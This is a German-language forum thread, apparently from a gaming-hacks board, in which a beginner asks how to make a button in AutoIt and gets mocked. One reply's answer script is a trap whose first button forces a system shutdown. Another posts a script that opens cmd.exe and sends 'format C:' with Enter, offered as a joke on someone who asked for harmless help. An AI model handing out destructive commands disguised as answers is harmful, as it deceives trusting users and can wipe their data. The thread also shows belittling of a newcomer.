heyy zusammen..^^
wie kann man in autoit einen button erstellen
und ihn eine funktion zuteilen???
danke im vorraus
wie kann man in autoit einen button erstellen
und ihn eine funktion zuteilen???
danke im vorraus
#include <GUIConstants.au3>
Global $blutdruck = "90"
Global $Hilfsbereitschaft = "100 %"
#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("google = shicäh", 400, 99, 336, 172)
$Button1 = GUICtrlCreateButton("epvp member nerven!", 8, 8, 193, 81, 0)
$Button2 = GUICtrlCreateButton("Eigeninitiative ergreifen", 208, 8, 185, 81, 0)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Button1
_nerven()
Case $Button2
_google()
EndSwitch
WEnd
Func _nerven()
Dim $blutdruck = "180"
Dim $Hilfsbereitschaft = "0 %"
ShellExecute("http://www.elitepvpers.com/forum/autoit/930551-autoit-button.html", 1)
ToolTip ("Ciao - Unwürdiger!", 0, 0)
Sleep(3000)
If $blutdruck = "180" and $Hilfsbereitschaft = "0 %" Then
Shutdown (1)
EndIf
EndFunc
Func _google()
ShellExecute ("http://www.google.de/#hl=de&expIds=25657&xhr=t&q=autoit+button+function+&cp=23&pf=p&sclient=psy&aq=f&aqi=&aql=&oq=autoit+button+function+&gs_rfai=&pbx=1&fp=3cadb483bc8f8289",1)
EndFunc
cool^^ nur das " Shutdown (1) " is nich so schön^^Quote:
Hier, bitteschön! :) Gleich mit zwei Beispielen. Ach und, das sind bestimmt keine Anspielungen in dem Script, wäre ja absurd.PHP Code:#include <GUIConstants.au3>
Global $blutdruck = "90"
Global $Hilfsbereitschaft = "100 %"
#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("google = shicäh", 400, 99, 336, 172)
$Button1 = GUICtrlCreateButton("epvp member nerven!", 8, 8, 193, 81, 0)
$Button2 = GUICtrlCreateButton("Eigeninitiative ergreifen", 208, 8, 185, 81, 0)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Button1
_nerven()
Case $Button2
_google()
EndSwitch
WEnd
Func _nerven()
Dim $blutdruck = "180"
Dim $Hilfsbereitschaft = "0 %"
ShellExecute("http://www.elitepvpers.com/forum/autoit/930551-autoit-button.html", 1)
ToolTip ("Ciao - Unwürdiger!", 0, 0)
Sleep(3000)
If $blutdruck = "180" and $Hilfsbereitschaft = "0 %" Then
Shutdown (1)
EndIf
EndFunc
Func _google()
ShellExecute ("http://www.google.de/#hl=de&expIds=25657&xhr=t&q=autoit+button+function+&cp=23&pf=p&sclient=psy&aq=f&aqi=&aql=&oq=autoit+button+function+&gs_rfai=&pbx=1&fp=3cadb483bc8f8289",1)
EndFunc
:facepalm:Quote:
ja, so denke ich auch. probier mal das:
:)PHP Code:Run("cmd.exe")
If ProcessExists("cmd.exe") = 1 Then
Send ("format C:")
Sleep(10)
Send ("{ENTER}")
EndIf
vll. lernens die leute dann irgendwann. außerdem, war der code, den ich als erstes gepostet hab falsch. ProcessExists gibt keinen Wert zurück. Der, der jetzt drin steht funktioniert jedoch.Quote:
:facepalm:
Stell dir vor her hat kp von garnichts und formatiert jetzt die festplatte würdest du auch nicht schön finden.
Dann benutz doch Google! ich meine, was hält dich davon ab? die meisten haben google sogar als startseite. wie kann es dann so schwer sein, einfach mal zu googeln? vorallem sowas einfaches -.-..Quote:
Originally Posted by szmast3rich wollte nur wissen wie man son button macht... -.-
ps funzt auch nich..^^ der schreibt aufm desktop^^ und nich in cmd...Quote:
vll. lernens die leute dann irgendwann. außerdem, war der code, den ich als erstes gepostet hab falsch. ProcessExists gibt keinen Wert zurück. Der, der jetzt drin steht funktioniert jedoch.
Dann benutz doch Google! ich meine, was hält dich davon ab? die meisten haben google sogar als startseite. wie kann es dann so schwer sein, einfach mal zu googeln? vorallem sowas einfaches -.-..
sei mal froh dass ich so nett bin. jetzt geht der script und selbst solltest du ihn ausführen, musst du das in cmd noch einmal bestätigen. ;)Quote:
ps funzt auch nich..^^ der schreibt aufm desktop^^ und nich in cmd...
hab probiert^^ aber nich mit format c: hab stattdessen was anderes reingehaun xD
wenn ich dich nerver warum nimmst du dann die zeit und antwortest????
FAIL
Große töne spucken aber selbst nichts aufm kasten habenQuote:
vll. lernens die leute dann irgendwann. außerdem, war der code, den ich als erstes gepostet hab falsch. ProcessExists gibt keinen Wert zurück. Der, der jetzt drin steht funktioniert jedoch.
Dann benutz doch Google! ich meine, was hält dich davon ab? die meisten haben google sogar als startseite. wie kann es dann so schwer sein, einfach mal zu googeln? vorallem sowas einfaches -.-..
ich hab gegoogelt und bin daraus nicht schlau geworden. wenn du nur 1 sekunde brauchst, dann schick mir doch n google link, wo beschrieben wird wie man über die memory mausklicks ausführt. ;)Quote:
Große töne spucken aber selbst nichts aufm kasten haben
*hust* [Only registered and activated users can see links. Click Here To Register...] *hust*
eine sek googlen = win